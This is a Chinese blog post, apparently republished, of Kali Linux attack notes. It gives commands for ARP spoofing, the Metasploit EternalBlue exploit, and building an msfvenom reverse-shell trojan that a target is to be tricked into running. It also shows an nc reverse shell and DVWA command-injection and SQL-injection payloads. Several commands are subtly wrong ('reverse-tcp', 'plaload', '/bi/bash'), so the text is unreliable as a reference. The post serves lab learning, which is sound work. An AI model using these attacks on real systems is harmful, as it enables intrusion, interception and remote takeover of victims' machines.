首页 > 其他分享 >Kali常用攻击方式

Kali常用攻击方式

时间:2024-06-01 22:04:06浏览次数:16  
标签:常用 set 攻击 Kali 192.168 Attack 靶机 执行 攻击方式

1 社会工程学 setoolkit

1)Social-Engineering Attacks:社会工程学攻击

1)Spear-Phishing Attack Vectors:鱼叉式网络钓鱼攻击向量

2)Website Attack Vectors:网页攻击向量

3)Infectious Media Generator:感染式媒介生成器

4) Create a Payload and Listener:创建Payload和Listener

5)Mass Mailer Attack:海量邮件攻击

6)Arduino-Based Attack Vector:基于Arduino的硬件攻击向量

7)Wireless Access Point Attack Vector:无线热点攻击向量

8)QRCode Generator Attack Vector:二维码攻击向量

9)Powershell Attack Vectors:Powershell攻击向量

10)Third Party Modules:第三方模块

99)返回到主菜单。
————————————————
 
    
2
    
2)Penestration Testing (Fast-Track):渗透测试(Fast-Track)

3)Third Party Modules:第三方模块

4)Update the Social-Engineer Toolkit:升级社会工程学工具包

5)Update SET configuration:升级SET配置

6)Help, Credits, and About:帮助等

2 arp欺骗

# ① 命令:arpspoof
# ② 网卡: eth0
# ③ 攻击ip:192.168.44.134
# ④:替换ipMAC地址:192.168.44.2

sudo arpspoof -i eth0 -t 192.168.44.134 192.168.44.2

3 msfconsole

① 安装 apt install metasploit-framework

② 永恒之蓝 漏洞实验 ms17-010

步骤:

msfconsole # 进入msf
search ms17-010 # 搜索永恒之蓝模块
use 0 # 有四种攻击方式,选择第一种。
show options # 查看需要的配置项,字段Required 为true,为必填项
set rhosts 192.168.1.1 # 设置靶机ip,可一次设置多个
set rport  445 # 设置靶机端口
set lhost 192.168.1.2 #设置攻机ip
set lport 1524 # 设置攻机端口、
run # 开始攻击,出现------win----为攻击成功
help # 查看可以控制靶机命令,控制完成

4 制作远程控制靶机木马

生成的木马会被杀毒软件直接清除

#步骤一 生成木马执行文件 ,将生成的exe执行文件想办法放入到靶机中。
# -p payload 载荷
# payload_name 系统/架构/作用/方法 
# -f 格式 
# -o output
msfvenom -p windows/x64/meterpreter/reverse-tcp lhost=192.168.0.1 lport=9999 -f exe -o test.exe

msfconsole
use exploit/multi/handler
show options 
set plaload windows/x64/meterpreter/reverse-tcp # 负载方式、ip、端口需要和生成的执行文件一致
set lhost 192.168.0.1
set lport 9999
run
# 再通过别的手段让靶机双击执行文件,就攻击成功。

5 DVWA (web渗透机安装)

① dvwa安装路径:https://github.com/digininja/DVWA

② 安装phpstudy 2018年版本

③ 将dvwa文件放入phpstudy中的www目录中,将config.inc.php文件中的数据库用户名和密码修改为root/root,启动phpstudy服务,

④ 访问URL:http://localhost:80/dvwa ,在setup中创建数据库,访问账号密码:admin/password

6 DVWA_command 命令执行攻击

# 输入 127.0.0.1 测试环境
# windows可用分隔符: && || & |
# Linux 可用分隔符: && || & | ;


A; B   //A不论正确与否都会执行B
A&B   //A后台运行,A和B同时执行
A&&B   //A执行成功后才会执行B
A|B     //A执行的输出结果作为B命令的参数,A不论正确与否,都会执行B
A||B     //A执行失败后才会执行B命令

7 扩展:nc工具(瑞士军刀)——反弹shell

# 实验功放机都为kali
# 攻机
nc -lvp 8888
# 靶机
nc 10.196.93.101 -e /bi/bash 8888

8 DVWA_SQL注入

# 注入查询用户名和密码
# union 联合查询  
1' union select user,password from users#
'or 1=1 -- - #简单通用sql注入

① 使用sqlmap工具进行sql注入

9 信息收集

① Zenmap ip扫描

wait onl oad…

标签:常用,set,攻击,Kali,192.168,Attack,靶机,执行,攻击方式
From: https://blog.csdn.net/weixin_45793745/article/details/139380179

相关文章

  • MySQL常用语句总结
    本篇MySQL语句笔记录笔记所引用案例为B站未明学院SQL课程教学案例,个人觉得这个UP主的视频讲解特别仔细,感兴趣小伙伴可以去听听~一、数据库操作(MySQL运行界面)按Pageup和Pagedown可以将之前出现过的命令正序或者倒序展示,避免重复输入命令。--展示所有的数据库SHOWDATABASE......
  • VMware虚拟机中Centos最小化安装后的常用配置
    每次在虚拟机安装linux之后都要配置固定ip,安装docker等操作,所以使用此文章,记录以后快速配置1.设置静态IP设置静态ip前,如果没有配置过虚拟机网络的,先进行如下配置:关于VMwareWorkstationPro中虚拟机无法连接外网问题解决在虚拟机界面,配置静态IP,方便使用shell工具进行......
  • Vue3的自动化测试怎么做?详细说明一下常用的测试工具和框架
    随着前端技术的飞速发展,Vue3作为一个优秀的前端框架,已经广泛应用于各类项目中。在开发过程中,为了提升代码质量、减少运维成本,自动化测试变得尤为重要。不仅可以提高开发效率,还能确保产品的稳定性。那么,Vue3自动化测试该怎么做呢?本文将详细介绍常用的测试工具和框架。为......
  • Linux 常用命令宝典(超详细) (下)
    书接上回14、管道符“|”cattest.txt|grep'world' #把前边的查询结果,当做后边的数据源来处理.#查询test文档中所有存在'world'的行.15、tail命令#格式:tail[-num-f]要查看的文件 -num:看(末尾)几行-f:持续追踪tailte......
  • Linux 常用命令宝典(超详细) (上)
            在职场中,有很多运维或者开发工作都需要通过命令来完成,很少有用到图形界面。作为一名后端程序员我们必须掌握一些Linux常用的终端命令。Linux发行版的命令大概有200多个,常用的命令有二十余个,本文将详细介绍这些命令。Linux命令格式:#Linux命令格式,如下的......
  • wafw00f一键检测目标防火墙信息(KALI工具系列十五)
    目录1、KALILINUX简介2、wafw00f工具简介 3、在KALI中使用lbd3.1查看可检测的防火墙对象3.2目标防火墙种类检测3.3 目标防火墙详细信息检测3.4将检查结果输出4、总结1、KALILINUX简介KaliLinux是一个功能强大、多才多艺的Linux发行版,广泛用于网络安全......
  • zenmap一键开启可视化扫描(KALI工具系列十一)
    目录1、KALILINUX简介2、zenmap工具简介  3、在KALI中使用zenmap3.1启动zenmap3.2界面介绍3.3扫描结果4、总结1、KALILINUX简介KaliLinux是一个功能强大、多才多艺的Linux发行版,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试......
  • 总结常用9种下载(限速、多线程加速、ZIP、导Excel)
    一、前言下载文件在我们项目很常见,有下载视频、文件、图片、附件、导出Excel、导出Zip压缩文件等等,这里我对常见的下载做个简单的总结,主要有文件下载、限速下载、多文件打包下载、URL文件打包下载、Excel导出下载、Excel批量导出Zip包下载、多线程加速下载。二、搭建SpringBoo......
  • Grid 布局-子项补充及常用布局
    上篇我们介绍了Grid布局容器项的内容,看上去属性很多,其实并没有,记住关键的概念和简写就行啦.因为是二维的,这个属性的数量就比flex要多很多哦,但其实真正也没有常用那没多啦.定义网格:grid-template-rows/grid-template-columns;合并区域:grid-tempalte-......
  • C++常用STL容器
    备注:文中图片来自hackingcpp.vectorvector是C++中最常用的容器,它可以动态改变自身大小。dequelist(双向链表)forward_list(单向链表)unordered_setsetunordered_mapmap......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99